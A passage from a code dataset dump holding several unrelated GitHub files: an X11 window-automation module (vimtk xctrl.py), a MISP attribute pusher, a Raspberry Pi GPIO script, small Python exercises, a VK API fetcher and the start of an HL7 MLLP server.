val_accum = []\n # Parse key/val lines\n def accept(info, curr_key, val_accum):\n if curr_key is not None:\n info[curr_key] = (' '.join(val_accum)).strip()\n val_accum.clear()\n for line in out.split('\\n'):\n if ':' in line:\n accept(info, curr_key, val_accum)\n key, val = line.split(':', 1)\n val_accum.append(val)\n curr_key = key.strip()\n else:\n val_accum.append(line)\n accept(info, curr_key, val_accum)\n return info\n\n def process_name(self):\n proc = self.process()\n return proc.name()\n\n def focus(self, sleeptime=None):\n ub.cmd('wmctrl -ia {}'.format(self.hexid))\n time.sleep(sleeptime if sleeptime is not None else self.sleeptime)\n\n def info(self):\n info = self.cache.copy()\n info['proc_name'] = self.process_name()\n return info\n\n def move(self, bbox):\n \"\"\"\n CommandLine:\n # List windows\n wmctrl -l\n # List desktops\n wmctrl -d\n\n # Window info\n xwininfo -id 60817412\n\n python -m vimtk.xctrl XWindow.move joncrall 0+1920,680,400,600,400\n python -m vimtk.xctrl XWindow.move joncrall [0,0,1000,1000]\n python -m vimtk.xctrl XWindow.move GVIM special2\n python -m vimtk.xctrl XWindow.move joncrall special2\n python -m vimtk.xctrl XWindow.move x-terminal-emulator.X-terminal-emulator [0,0,1000,1000]\n CommandLine:\n python -m vimtk.xctrl XWindow.move\n\n CommandLine:\n python -m vimtk.xctrl XCtrl.move_window\n\n Example:\n >>> # xdoctest: +SKIP\n >>> XCtrl.move_window('joncrall', '[0,0,1000,1000]')\n\n Ignore:\n # >>> orig_window = []\n # >>> X = xctrl.XCtrl\n win_key = 'x-terminal-emulator.X-terminal-emulator'\n win_id = X.findall_window_ids(key)[0]\n\n python -m xctrl XCtrl.findall_window_ids gvim\n\n \"\"\"\n monitor_infos = {\n i + 1: cplat.get_resolution_info(i)\n for i in range(2)\n }\n # TODO: cut out borders\n # TODO: fix screeninfo monitor offsets\n # TODO: dynamic num screens\n def rel_to_abs_bbox(m, x, y, w, h):\n \"\"\" monitor_num, relative x, y, w, h \"\"\"\n minfo = monitor_infos[m]\n # print('minfo(%d) = %s' % (m, ub.repr2(minfo),))\n mx, my = minfo['off_x'], minfo['off_y']\n mw, mh = minfo['pixels_w'], minfo['pixels_h']\n # Transform to the absolution position\n abs_x = (x * mw) + mx\n abs_y = (y * mh) + my\n abs_w = (w * mw)\n abs_h = (h * mh)\n abs_bbox = [abs_x, abs_y, abs_w, abs_h]\n abs_bbox = ','.join(map(str, map(int, abs_bbox)))\n return abs_bbox\n\n if self.title().startswith('joncrall') and bbox == 'special2':\n # Specify the relative position\n abs_bbox = rel_to_abs_bbox(m=2,\n x=0.0, y=0.7,\n w=1.0, h=0.3)\n elif self.title().startswith('GVIM') and bbox == 'special2':\n # Specify the relative position\n abs_bbox = rel_to_abs_bbox(m=2,\n x=0.0, y=0.0,\n w=1.0, h=0.7)\n else:\n abs_bbox = ','.join(map(str, eval(bbox)))\n\n print('MOVING: win_key = %r' % (self.title(),))\n print('TO: abs_bbox = %r' % (abs_bbox,))\n # abs_bbox.replace('[', '').replace(']', '')\n # get = lambda cmd: XCtrl.cmd(' '.join([\"/bin/bash\", \"-c\", cmd]))['out'] # NOQA\n win_id = XCtrl.find_window_id(self.title(), error='raise')\n print('MOVING: win_id = %r' % (win_id,))\n fmtdict = locals()\n cmd_list = [\n (\"wmctrl -ir {win_id} -b remove,maximized_horz\".format(**fmtdict)),\n (\"wmctrl -ir {win_id} -b remove,maximized_vert\".format(**fmtdict)),\n (\"wmctrl -ir {win_id} -e 0,{abs_bbox}\".format(**fmtdict)),\n ]\n print('\\n'.join(cmd_list))\n for cmd in cmd_list:\n XCtrl.cmd(cmd)\n\n\ndef _wmctrl_terminal_patterns():\n \"\"\"\n wmctrl patterns associated with common terminals\n \"\"\"\n terminal_pattern = r'|'.join([\n 'terminal',\n re.escape('terminator.Terminator'), # gtk3 terminator\n re.escape('x-terminal-emulator.X-terminal-emulator'), # gtk2 terminator\n # other common terminal applications\n 'tilix',\n 'konsole',\n 'rxvt',\n 'terminology',\n 'xterm',\n 'tilda',\n 'Yakuake',\n ])\n return terminal_pattern\n\n\nclass XCtrl(object):\n r\"\"\"\n xdotool key ctrl+shift+i\n\n References:\n http://superuser.com/questions/382616/detecting-currently-active-window\n http://askubuntu.com/questions/455762/xbindkeys-wont-work-properly\n\n Ignore:\n xdotool keyup --window 0 7 type --clearmodifiers ---window 0 '%paste'\n\n # List current windows:\n wmctrl -l\n\n # Get current window\n xdotool getwindowfocus getwindowname\n\n\n #====\n # Get last opened window\n #====\n\n win_title=x-terminal-emulator.X-terminal-emulator\n key_ = 'x-terminal-emulator.X-terminal-emulator'\n\n # Get all windows in current workspace\n workspace_number=`wmctrl -d | grep '\\*' | cut -d' ' -f 1`\n win_list=`wmctrl -lx | grep $win_title | grep \" $workspace_number \" | awk '{print $1}'`\n\n # Get stacking order of windows in current workspace\n win_order=$(xprop -root|grep \"^_NET_CLIENT_LIST_STACKING\" | tr \",\" \" \")\n echo $win_order\n\n CommandLine:\n python -m vimtk.xctrl XCtrl:0\n\n Example:\n >>> # xdoctest: +SKIP\n >>> # Script\n >>> orig_window = []\n >>> copy_text_to_clipboard(lorium_ipsum())\n >>> doscript = [\n >>> ('focus', 'x-terminal-emulator.X-terminal-emulator'),\n >>> ('type', '%paste'),\n >>> ('key', 'KP_Enter'),\n >>> # ('focus', 'GVIM')\n >>> ]\n >>> XCtrl.do(*doscript, sleeptime=.01)\n\n Ignore:\n >>> # xdoctest: +SKIP\n >>> copy_text_to_clipboard(text)\n >>> if '\\n' in text or len(text) > 20:\n >>> text = '\\'%paste\\''\n >>> else:\n >>> import pipes\n >>> text = pipes.quote(text.lstrip(' '))\n >>> ('focus', 'GVIM'),\n >>> #\n >>> doscript = [\n >>> ('focus', 'x-terminal-emulator.X-terminal-emulator'),\n >>> ('type', text),\n >>> ('key', 'KP_Enter'),\n >>> ]\n >>> XCtrl.do(*doscript, sleeptime=.01)\n\n \"\"\"\n # @staticmethod\n # def send_raw_key_input(keys):\n # print('send key input: %r' % (keys,))\n # args = ['xdotool', 'type', keys]\n # XCtrl.cmd(*args, quiet=True, silence=True)\n\n @classmethod\n def cmd(XCtrl, command):\n logging.debug('[cmd] {}'.format(command))\n info = ub.cmd(command)\n if info['ret'] != 0:\n logging.warn('Something went wrong {}'.format(ub.repr2(info)))\n return info\n\n @classmethod\n def findall_window_ids(XCtrl, pattern):\n \"\"\"\n CommandLine:\n python -m vimtk.xctrl XCtrl.findall_window_ids --pat=gvim\n python -m vimtk.xctrl XCtrl.findall_window_ids --pat=gvim\n python -m vimtk.xctrl XCtrl.findall_window_ids --pat=joncrall\n\n Example:\n >>> # xdoctest: +SKIP\n >>> pattern = ub.argval('--pat')\n >>> winid_list = XCtrl.findall_window_ids(pattern)\n >>> print('winid_list = {!r}'.format(winid_list))\n\n Ignore:\n wmctrl -l\n xprop -id\n wmctrl -l | awk '{print $1}' | xprop -id\n 0x00a00007 | grep \"WM_CLASS(STRING)\"\n \"\"\"\n # List all windows and their identifiers\n info = XCtrl.cmd('wmctrl -lx')\n lines = info['out'].split('\\n')\n # Find windows with identifiers matching the pattern\n lines = [line for line in lines if re.search(pattern, line)]\n # Get the hex-id portion of the output\n winid_list = [line.split()[0] for line in lines]\n winid_list = [int(h, 16) for h in winid_list if h]\n return winid_list\n\n @classmethod\n def sort_window_ids(XCtrl, winid_list, order='mru'):\n \"\"\"\n Orders window ids by most recently used\n \"\"\"\n def isect(list1, list2):\n set2 = set(list2)\n return [item for item in list1 if item in set2]\n\n winid_order = XCtrl.sorted_window_ids(order)\n sorted_win_ids = isect(winid_order, winid_list)\n return sorted_win_ids\n\n @staticmethod\n def killold(pattern, num=4):\n \"\"\"\n Leaves no more than `num` instances of a program alive. Ordering is\n determined by most recent usage.\n\n CommandLine:\n python -m vimtk.xctrl XCtrl.killold gvim 2\n\n Example:\n >>> # xdoctest: +SKIP\n >>> XCtrl = xctrl.XCtrl\n >>> pattern = 'gvim'\n >>> num = 2\n \"\"\"\n import psutil\n num = int(num)\n winid_list = XCtrl.findall_window_ids(pattern)\n winid_list = XCtrl.sort_window_ids(winid_list, 'mru')[num:]\n\n info = XCtrl.cmd('wmctrl -lxp')\n lines = info['out'].split('\\n')\n lines = [' '.join(list(ub.take(line.split(), [0, 2])))\n for line in lines]\n output_lines = lines\n # output_lines = XCtrl.cmd(\n # \"\"\"wmctrl -lxp | awk '{print $1 \" \" $3}'\"\"\",\n # **cmdkw)['out'].strip().split('\\n')\n output_fields = [line.split(' ') for line in output_lines]\n output_fields = [(int(wid, 16), int(pid)) for wid, pid in output_fields]\n pid_list = [pid for wid, pid in output_fields if wid in winid_list]\n for pid in pid_list:\n proc = psutil.Process(pid=pid)\n proc.kill()\n\n @staticmethod\n def sorted_window_ids(order='mru'):\n \"\"\"\n Returns window ids orderd by criteria\n default is mru (most recently used)\n\n CommandLine:\n xprop -root | grep \"^_NET_CLIENT_LIST_STACKING\" | tr \",\" \" \"\n python -m vimtk.xctrl XCtrl.sorted_window_ids\n\n CommandLine:\n python -m vimtk.xctrl XCtrl.sorted_window_ids\n\n Example:\n >>> # xdoctest: +SKIP\n >>> winid_order = XCtrl.sorted_window_ids()\n >>> print('winid_order = {!r}'.format(winid_order))\n \"\"\"\n info = XCtrl.cmd('xprop -root')\n lines = [line for line in info['out'].split('\\n')\n if line.startswith('_NET_CLIENT_LIST_STACKING')]\n assert len(lines) == 1, str(lines)\n winid_order_str = lines[0]\n winid_order = winid_order_str.split('#')[1].strip().split(', ')[::-1]\n winid_order = [int(h, 16) for h in winid_order]\n if order == 'lru':\n winid_order = winid_order[::-1]\n elif order == 'mru':\n winid_order = winid_order\n else:\n raise NotImplementedError(order)\n return winid_order\n\n @staticmethod\n def find_window_id(pattern, method='mru', error='raise'):\n \"\"\"\n xprop -id 0x00a00007 | grep \"WM_CLASS(STRING)\"\n \"\"\"\n logging.debug('Find window id pattern={}, method={}'.format(pattern, method))\n winid_candidates = XCtrl.findall_window_ids(pattern)\n if len(winid_candidates) == 0:\n if error == 'raise':\n available_windows = XCtrl.cmd('wmctrl -lx')['out']\n msg = 'No window matches pattern=%r' % (pattern,)\n msg += '\\navailable windows are:\\n%s' % (available_windows,)\n logger.error(msg)\n raise Exception(msg)\n win_id = None\n elif len(winid_candidates) == 1:\n win_id = winid_candidates[0]\n else:\n # print('Multiple (%d) windows matches pattern=%r' % (\n # len(winid_list), pattern,))\n # Find most recently used window with the focus name.\n win_id = XCtrl.sort_window_ids(winid_candidates, method)[0]\n return win_id\n\n @staticmethod\n def current_gvim_edit(op='e', fpath=''):\n r\"\"\"\n CommandLine:\n python -m vimtk.xctrl XCtrl.current_gvim_edit sp ~/.bashrc\n \"\"\"\n fpath = ub.shrinkuser(ub.truepath(fpath))\n # print('fpath = %r' % (fpath,))\n cplat.copy_text_to_clipboard(fpath)\n doscript = [\n ('focus', 'gvim'),\n ('key', 'Escape'),\n ('type2', ';' + op + ' ' + fpath),\n # ('type2', ';' + op + ' '),\n # ('key', 'ctrl+v'),\n ('key', 'KP_Enter'),\n ]\n XCtrl.do(*doscript, verbose=0, sleeptime=.001)\n\n @staticmethod\n def copy_gvim_to_terminal_script(text, return_to_win=\"1\", verbose=0, sleeptime=.02):\n \"\"\"\n vimtk.xctrl.XCtrl.copy_gvim_to_terminal_script('print(\"hi\")', verbose=1)\n python -m vimtk.xctrl XCtrl.copy_gvim_to_terminal_script \"echo hi\" 1 1\n\n If this doesn't work make sure pyperclip is installed and set to xsel\n\n print('foobar')\n echo hi\n \"\"\"\n # Prepare to send text to xdotool\n cplat.copy_text_to_clipboard(text)\n\n if verbose:\n print('text = %r' % (text,))\n print(cplat.get_clipboard())\n\n terminal_pattern = r'\\|'.join([\n 'terminal',\n re.escape('terminator.Terminator'), # gtk3 terminator\n re.escape('x-terminal-emulator.X-terminal-emulator'), # gtk2 terminator\n ])\n\n # Build xdtool script\n doscript = [\n ('remember_window_id', 'ACTIVE_WIN'),\n # ('focus', 'x-terminal-emulator.X-terminal-emulator'),\n ('focus', terminal_pattern),\n ('key', 'ctrl+shift+v'),\n ('key', 'KP_Enter'),\n ]\n if '\\n' in text:\n # Press enter twice for multiline texts\n doscript += [\n ('key', 'KP_Enter'),\n ]\n\n if return_to_win == \"1\":\n doscript += [\n ('focus_id', '$ACTIVE_WIN'),\n ]\n # execute script\n # verbose = 1\n XCtrl.do(*doscript, sleeptime=sleeptime, verbose=verbose)\n\n @staticmethod\n def do(*cmd_list, **kwargs):\n \"\"\"\n DEPRICATE THIS\n \"\"\"\n verbose = kwargs.get('verbose', False)\n if verbose:\n print = logger.info\n else:\n print = logger.debug\n\n print('Executing x do: %s' % (ub.repr2(cmd_list),))\n\n # http://askubuntu.com/questions/455762/xbindkeys-wont-work-properly\n # Make things work even if other keys are pressed\n defaultsleep = 0.0\n sleeptime = kwargs.get('sleeptime', defaultsleep)\n time.sleep(.05)\n XCtrl.cmd('xset r off')\n\n memory = {}\n\n for count, item in enumerate(cmd_list):\n # print('item = %r' % (item,))\n sleeptime = kwargs.get('sleeptime', defaultsleep)\n\n assert isinstance(item, tuple)\n assert len(item) >= 2\n xcmd, key_ = item[0:2]\n if len(item) >= 3:\n if isinstance(item[2], six.string_types) and item[2].endswith('?'):\n sleeptime = float(item[2][:-1])\n print('special command sleep')\n print('sleeptime = %r' % (sleeptime,))\n else:\n sleeptime = float(item[2])\n\n args = []\n\n print('# Step %d' % (count,))\n print('xcmd = {!r}'.format(xcmd))\n\n if xcmd == 'focus':\n key_ = str(key_)\n if key_.startswith('$'):\n key_ = memory[key_[1:]]\n pattern = key_\n win_id = XCtrl.find_window_id(pattern, method='mru')\n if win_id is None:\n args = ['wmctrl', '-xa', pattern]\n else:\n args = ['wmctrl', '-ia', hex(win_id)]\n elif xcmd == 'focus_id':\n key_ = str(key_)\n if key_.startswith('$'):\n key_ = memory[key_[1:]]\n args = ['wmctrl', '-ia', hex(key_)]\n elif xcmd == 'remember_window_id':\n memory[key_] = XCtrl.current_window_id()\n continue\n elif xcmd == 'remember_window_name':\n memory[key_] = XCtrl.current_window_name()\n continue\n elif xcmd == 'type':\n args = [\n 'xdotool',\n 'keyup', '--window', '0', '7',\n 'type', '--clearmodifiers',\n '--window', '0', str(key_)\n ]\n elif xcmd == 'type2':\n args = [\n 'xdotool', 'type', pipes.quote(str(key_))\n ]\n elif xcmd == 'xset-r-on':\n args = ['xset', 'r', 'on']\n elif xcmd == 'xset-r-off':\n args = ['xset', 'r', 'off']\n else:\n args = ['xdotool', str(xcmd), str(key_)]\n\n print('args = {!r}'.format(args))\n XCtrl.cmd(args)\n\n if sleeptime > 0:\n time.sleep(sleeptime)\n\n XCtrl.cmd('xset r on')\n\n @staticmethod\n def current_window_id():\n logging.debug('Get current window id')\n info = XCtrl.cmd('xdotool getwindowfocus')\n value = int(info['out'].strip())\n logging.debug('... current window id = {}'.format(value))\n return value\n\n @staticmethod\n def current_window_name():\n logging.debug('Get current window name')\n info = XCtrl.cmd('xdotool getwindowfocus getwindowname')\n value = pipes.quote(info['out'].strip())\n logging.debug('... current window name = {}'.format(value))\n return value\n\n @staticmethod\n def focus_window(winhandle, path=None, name=None, sleeptime=.01):\n \"\"\"\n sudo apt-get install xautomation\n apt-get install autokey-gtk\n\n wmctrl -xa gnome-terminal.Gnome-terminal\n wmctrl -xl\n \"\"\"\n print('focus: ' + winhandle)\n args = ['wmctrl', '-xa', winhandle]\n XCtrl.cmd(*args, verbose=False)\n time.sleep(sleeptime)\n\n @classmethod\n def send_keys(XCtrl, key, sleeptime=0.1):\n args = ['xdotool', 'key', str(key)]\n XCtrl.cmd(args)\n time.sleep(sleeptime)\n\n # @classmethod\n # def focus(XCtrl, pattern=None, win_id=None, sleeptime=.01):\n # \"\"\"\n # sudo apt-get install xautomation\n # apt-get install autokey-gtk\n\n # wmctrl -xa gnome-terminal.Gnome-terminal\n # wmctrl -xl\n # \"\"\"\n # if pattern is not None:\n # assert win_id is None\n # if win_id is None:\n # assert pattern is not None\n # win_id = XCtrl.find_window_id(pattern, method='mru')\n\n # if win_id is None:\n # args = ['wmctrl', '-xa', pattern]\n # else:\n # args = ['wmctrl', '-ia', hex(win_id)]\n\n # XCtrl.cmd(*args, verbose=False)\n # time.sleep(sleeptime)\n\n\nif __name__ == '__main__':\n r\"\"\"\n CommandLine:\n export PYTHONPATH=$PYTHONPATH:$HOME/code/vimtk\n python -m vimtk.xctrl\n \"\"\"\n import xdoctest\n xdoctest.doctest_module(__file__)\n","repo_name":"Erotemic/vimtk","sub_path":"vimtk/xctrl.py","file_name":"xctrl.py","file_ext":"py","file_size_in_byte":28568,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"14228825336","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pymisp import PyMISP\nfrom pymisp import ExpandedPyMISP\nfrom pymisp import MISPAttribute\nfrom keys import misp_url, misp_key, misp_verifycert\n\nclass Pusher:\n \"\"\"\n Class used to push data to MISP instance\n this is used to push predictions to MISP\n \"\"\"\n def __init__(self, Type, Value, Category, Comment, EventId):\n self.Type = Type\n self.Value = Value\n self.Category = Category\n self.Comment = Comment\n self.EventId = EventId\n\n self.attribute = MISPAttribute()\n self.attribute.type = self.Type\n self.attribute.value = self.Value\n self.attribute.category = self.Category\n self.attribute.comment = self.Comment\n\n def create_attribute(self):\n misp = ExpandedPyMISP(misp_url, misp_key, misp_verifycert, debug=True)\n misp.add_attribute(self.EventId, self.attribute, pythonify=False)\n","repo_name":"BlazedLearning/PhishE","sub_path":"Update_event.py","file_name":"Update_event.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"7774213374","text":"import RPi.GPIO as gpio\nfrom time import sleep\n\n#Defining GPIO pin numbers\npin1 = 7 # This is GPIO6, hence, 5th pin in inner row from ports 41\npin2 = 8 # 8th pin in outer row from ports 42\npin3 = 9 # 9th pin in outer row from ports 39\npin4 = 11 # 10th pin in inner row from ports 40\n\n# Setting up basic GPIO settings\ngpio.setmode(gpio.BCM)\ngpio.setwarnings(False)\ngpio.setup(pin1, gpio.OUT)\ngpio.setup(pin2, gpio.OUT)\ngpio.setup(pin3, gpio.OUT)\ngpio.setup(pin4, gpio.OUT)\n\ndef move_to_cell(index):\n wait_time = 1\n if (index == 1):\n gpio.output(pin1, 1)\n elif (index == 2):\n gpio.output(pin2, 1)\n elif (index == 3):\n gpio.output(pin1, 1)\n gpio.output(pin2, 1)\n elif (index == 4):\n gpio.output(pin3, 1)\n elif (index == 6):\n gpio.output(pin1, 1)\n gpio.output(pin3, 1)\n sleep(wait_time)\n\ndef reset():\n gpio.output(pin1, 0)\n gpio.output(pin2, 0)\n gpio.output(pin3, 0)\n gpio.output(pin4, 0)\n sleep(1)\n","repo_name":"Ridhwanluthra/sem_long","sub_path":"scripts/to_firebird.py","file_name":"to_firebird.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42930057405","text":"def eh_primo(numero):\n if numero == 2:\n return True\n elif numero < 2:\n return False\n elif numero % 2 == 0:\n return False\n n = 3 \n while n< numero:\n if numero % n == 0:\n return False\n n+=2\n return True\n \ndef primos_entre(a,b):\n lista=[0]*(b-a)\n i=0\n l=[]\n while i < len(lista):\n lista[i] = a+1\n i+=1\n a+=1\n if eh_primo(lista[i]) == True:\n l.append(lista[i])\n return l\n \n \n \n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_344/ch51_2020_04_13_02_06_28_412421.py","file_name":"ch51_2020_04_13_02_06_28_412421.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28870075784","text":"import os\n\n\ndef get_abs_path(path_, ref=None):\n \"\"\" Return an absolute path\n\n It handles the following formats:\n\n * ~/things\n * ../things\n * things\n * /path/to/things\n\n :param path_: path\n :param ref: reference path to handle relative paths\n :return: absolute path\n \"\"\"\n if path_ is None:\n return None\n path = path_\n if path_.startswith('~'):\n path = os.path.expanduser(path_)\n elif not path_.startswith('/'):\n if ref is not None:\n prevdir = os.getcwd()\n try:\n os.chdir(ref)\n path = os.path.abspath(path_)\n finally:\n os.chdir(prevdir)\n else:\n path = os.path.abspath(path_)\n\n return path[:-1] if path.endswith('/') else path\n","repo_name":"ANSSI-FR/packetweaver","sub_path":"packetweaver/libs/sys/path_handling.py","file_name":"path_handling.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"32709071536","text":"import Queue\n\nfrom trpycore.pool.queue import QueuePool\n\nclass ESClientPool(QueuePool):\n \"\"\"ESClient pool.\n\n Example usage:\n with pool.get() as es_client:\n users = es_client.index('users', 'user')\n users.status()\n \"\"\"\n \n def __init__(self, es_client_factory, size, queue_class=Queue.Queue):\n \"\"\"ESClientPool constructor.\n\n Args:\n es_client_factory: Factory object to create ESClient objects.\n size: Number of objects to include in pool.\n queue_class: Optional Queue class. If not provided, will\n default to Queue.Queue. The specified class must\n have a no-arg constructor and provide a get(block, timeout)\n method.\n \"\"\"\n self.es_client_factory = es_client_factory\n self.size = size\n self.queue_class = queue_class\n super(ESClientPool, self).__init__(\n self.size,\n factory=self.es_client_factory,\n queue_class=self.queue_class)\n","repo_name":"techresidents/tres","sub_path":"tres/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30475074868","text":"import json\n\ncollections = [\n 'review_count',\n 'num_friends',\n 'useful',\n 'funny',\n 'cool',\n 'fans',\n 'elite',\n 'average_stars',\n 'compliment_cool',\n 'compliment_cute',\n 'compliment_funny',\n 'compliment_hot',\n 'compliment_list',\n 'compliment_more',\n 'compliment_note',\n 'compliment_photos',\n 'compliment_plain',\n 'compliment_writer'\n]\n\nfile_prefix = '../data/raw/collections/'\nfile_suffix = '.json'\n\nfor c in collections:\n file = file_prefix + c + file_suffix\n\n with open(file) as f:\n data = json.load(f)\n sorted_data = sorted(data)\n\n with open(file, 'w') as outfile:\n json.dump(sorted_data, outfile)","repo_name":"rahrang/yelp-dataset-project","sub_path":"src/scripts/helpers/sort_collections.py","file_name":"sort_collections.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21167933198","text":"# 2. Изучить список открытых API (https://www.programmableweb.com/category/all/apis).\n# Найти среди них любое, требующее авторизацию (любого типа).\n# Выполнить запросы к нему, пройдя авторизацию. Ответ сервера записать в файл.\n\nimport requests\nimport json\n\ntoken = 'xxxxxxxxxx'\n\nurl = 'https://api.vk.com/method/groups.get'\nparams = {\n 'access_token': token,\n 'user_id': '21507694',\n 'v': '5.130',\n 'extended': 1\n}\n\nreq = requests.get(url, params=params)\nprint(f'Код ответа: {req.status_code}')\nif req.ok:\n try:\n res = req.json()\n with open('groups.json', 'w', encoding='utf-8') as file:\n json.dump(res, file, indent=2, ensure_ascii=False)\n print('Список групп:')\n for item in res.get('response').get('items'):\n print(f'{item.get(\"name\")}')\n except ValueError:\n print('Ошибка сохранения в файл')\n","repo_name":"ZV8/GB-Web-data-processing-methods","sub_path":"Lesson_1/lesson_1_2.py","file_name":"lesson_1_2.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17019791714","text":"#Overview: Write a program that models an email message, then a test program to test the email emulator\n#Define a message class that includes a sender, recipient, and body\n#In the message class, have a constructor with self, sender, and recipient parameters\n#Set Values for the sender and recipient\n#Set body as an empty string\n\n#An append method w/ self and line parameters.\n#Line contains the line of text to add to the body of the message\n#Each line should end with a newline character\n\n#A to_string method that returns the string intepretation of the message\n#It should include the sender, recipient, and body of the message\n\n#A str_ok method that validates the string parameters\n\nfrom EllaLeyLab4 import Message\n\n\nLetter = Message()\nLetter.sender = 'Default Sender'\nLetter.recipient = 'Default Recipient'\nLetter.setBody(\"\")\ndef main():\n done = True\n while done:\n # Setting Sender\n Letter.setSender('Ella')\n # Output Sender\n print(f\"The sender is {Letter.sender}\")\n Letter.setRecipient('Stephanie')\n print(f\"The recipient is {Letter.recipient}\")\n # Message Body\n Letter.appendBody(\"For Christmas, I would like:\")\n Letter.appendBody(\"New Keyboard Switches\")\n Letter.appendBody(\"A VPC MongoosT-50CM3 Base\")\n# String Length checker validation\n Letter.appendBody(\"A VPC Constellation ALPHA-R, VPC MongoosT-50CM3 Throttle, and VPC Ace Flight Pedals\")\n Letter.toString()\n # Diagnostics\n # print(Letter.sender)\n # print(Letter.recipient)\n # print(f\"The final message is {Letter.FinalMessage}\")\n done = False\n\nif __name__ == \"__main__\":\n main()\n\n'''\nTest Run Results:\nThe sender is Ella\nThe recipient is Stephanie\nError: End of line expected\nFor Christmas, I would like:\nNew Keyboard Switches\nA VPC MongoosT-50CM3 Base\n\n'''","repo_name":"fuzesmonk/CIS-117-Assignments","sub_path":"Lab 4/demo_EllaLey.py","file_name":"demo_EllaLey.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15278861454","text":"# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (c) 2012-2015, CRS4\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\r\n# this software and associated documentation files (the \"Software\"), to deal in\r\n# the Software without restriction, including without limitation the rights to\r\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\r\n# the Software, and to permit persons to whom the Software is furnished to do so,\r\n# subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\r\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\r\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\r\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\r\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n# ALLLLLLLLLLLLLLL\r\nfrom __future__ import absolute_import\r\nfrom __future__ import print_function\r\nimport uuid\r\nfrom hl7apy.core import Message, Segment\r\nfrom hl7apy.parser import parse_message\r\n\r\nimport re\r\n\r\ntry:\r\n from SocketServer import StreamRequestHandler, TCPServer\r\nexcept ImportError: # Python 3\r\n from socketserver import StreamRequestHandler, TCPServer\r\n\r\n#: caracteres para codificação MLLP\r\nSB = \"\\x0b\"\r\nEB = \"\\x1c\"\r\nCR = \"\\x0d\"\r\n\r\nclass MLLProtocol(object):\r\n \"\"\"\r\n Apenas verifica se a mensagem está codificada no seguinte padrão:\r\n \\x0b{conteúdo_da_mensagem}\\x1c\\x0d\r\n \"\"\"\r\n validator = re.compile(SB + \"(([^\\r]+\\r){1,})\" + EB + CR)\r\n\r\n @staticmethod\r\n def get_message(line):\r\n message = None\r\n matched = MLLProtocol.validator.match(line)\r\n if matched is not None:\r\n message = matched.groups()[0]\r\n return message\r\n\r\n\r\ndef responder(m):\r\n # cria uma mensagem de resposta RSP_K11\r\n response = Message(\"RSP_K11\")\r\n response.MSH.MSH_9 = \"RSP^K11^RSP_K11\"\r\n response.MSA = \"MSA|AA\"\r\n response.MSA.MSA_2 = m.MSH.MSH_10\r\n qak = Segment(\"QAK\")\r\n qak.qak_1 = m.QPD.QPD_2\r\n qak.qak_2 = \"OK\"\r\n qak.qak_3 = \"Q22^Specimen Labeling Instructions^IHE_LABTF\"\r\n qak.qak_4 = \"1\"\r\n response.add(qak)\r\n response.QPD = m.QPD\r\n response.PID.PID_1 = '1'\r\n response.PID.PID_5.PID_5_1 = 'CUNHA'\r\n response.PID.PID_5.PID_5_2 = 'JOSE'\r\n response.PID.PID_6 = \"19800101\"\r\n response.PID.PID_7 = \"F\"\r\n response.PID.PID_23 = \"Brasil\"\r\n spm = Segment(\"SPM\")\r\n obr = Segment(\"OBR\")\r\n spm.SPM_1 = '1'\r\n spm.SPM_2 = \"12345\"\r\n obr.OBR_4 = \"ORDER^DESCRIPTION\"\r\n response.add(spm)\r\n response.add(obr)\r\n return response.to_mllp()\r\n\r\nclass MLLPServer(StreamRequestHandler):\r\n \"\"\"\r\n Simplistic implementation of a TCP server implementing the MLLP protocol\r\n HL7 messages are encoded between bytes \\x0b and \\x1c\\x0d\r\n \"\"\"\r\n\r\n def handle(self):\r\n line = ''\r\n while True:\r\n char = self.rfile.read(1)\r\n if not char:\r\n print('Cliente desconectado')\r\n break\r\n line += char\r\n # verifica se existe alguma mensagem HL7 no buffer\r\n message = MLLProtocol.get_message(line)\r\n if message is not None:\r\n\r\n try:\r\n # parse the incoming message\r\n m = parse_message(message, find_groups=False)\r\n print(\"\\n=========================================================================\")\r\n print(\"Mensagem recebida com sucesso\")\r\n print(\"\\nTipo da Mensagem Recebida: \", m.MSH.message_type.to_er7())\r\n print(\"\\nMensagem Recebida de: \", m.MSH.sending_application.to_er7())\r\n print(\"\\nConteudo da mensagem:\", repr(m.to_er7()))\r\n print(\"\\n=========================================================================\")\r\n except:\r\n 